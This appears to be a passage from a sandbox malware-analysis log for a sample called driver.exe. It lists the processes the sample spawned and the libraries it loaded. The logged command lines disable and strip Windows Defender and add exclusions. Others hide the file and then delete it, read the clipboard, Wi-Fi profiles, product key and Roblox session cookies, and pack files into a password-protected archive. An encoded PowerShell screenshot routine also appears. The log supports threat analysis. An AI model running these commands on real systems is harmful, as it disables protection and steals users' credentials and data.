              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe""Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\driver.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeSection loaded: sspicli.dllJump to behavior
